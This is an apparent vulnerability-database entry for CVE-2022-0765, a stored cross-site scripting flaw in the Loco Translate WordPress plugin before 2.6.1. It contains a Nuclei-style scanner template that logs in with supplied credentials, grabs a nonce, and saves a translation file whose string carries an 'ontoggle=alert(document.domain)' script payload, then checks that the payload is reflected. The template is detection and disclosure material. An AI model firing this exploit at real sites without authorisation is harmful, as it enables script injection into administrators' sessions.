漏洞描述
Loco Translate WordPress plugin before 2.6.1 contains a stored cross-site scripting vulnerability caused by improper removal of inline events from source translation strings, allowing authenticated users to inject arbitrary JavaScript payloads.
CVE-2022-0765: WordPress Loco Translate < 2.6.1 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2022-0765
info:
name: WordPress Loco Translate < 2.6.1 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
Loco Translate WordPress plugin before 2.6.1 contains a stored cross-site scripting vulnerability caused by improper removal of inline events from source translation strings, allowing authenticated users to inject arbitrary JavaScript payloads.
impact: |
Attackers can execute arbitrary JavaScript in the context of the admin panel, potentially leading to session hijacking or defacement.
remediation: |
Update to version 2.6.1 or later.
reference:
- https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587
- https://patchstack.com/database/vulnerability/loco-translate/wordpress-loco-translate-plugin-2-6-0-authenticated-stored-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-0765
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0765
cwe-id: CWE-79
epss-score: 0.10813
epss-percentile: 0.93117
cpe: cpe:2.3:a:loco_translate_project:loco_translate:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
tags: cve,cve2022,wordpress,wp,wp-plugin,xss,loco-translate,authenticated
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "loco-nonce")
condition: and
internal: true
extractors:
- type: regex
name: nonce
part: body_2
group: 1
regex:
- '"save":"([a-f0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXssTest
X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="locale"
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="path"
plugins/loco-translate/languages/loco-translate.pot
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="bundle"
plugin.loco-translate/loco.php
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="domain"
loco-translate
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="po"; filename="undefined"
Content-Type: application/x-gettext
msgid ""
msgstr ""
"Project-Id-Version: Loco Translate\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
msgid "\">'><details/open/ontoggle=alert(document.domain)>"
msgstr ""
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="action"
loco_json
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="route"
save
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="loco-nonce"
{{nonce}}
------WebKitFormBoundaryXssTest--
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "POT file saved")
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "ontoggle=alert(document.domain)>")
condition: and
# digest: 4b0a00483046022100e0372e22271463928ffce27ab314e550ebdbdaf606befadcee3311ea9d9a68d4022100b75c23b477b6c15686ba6c87eadde10037ecf51810e4e4d12fc717f1cb24e529:922c64590222798bb761d5b6d8e72950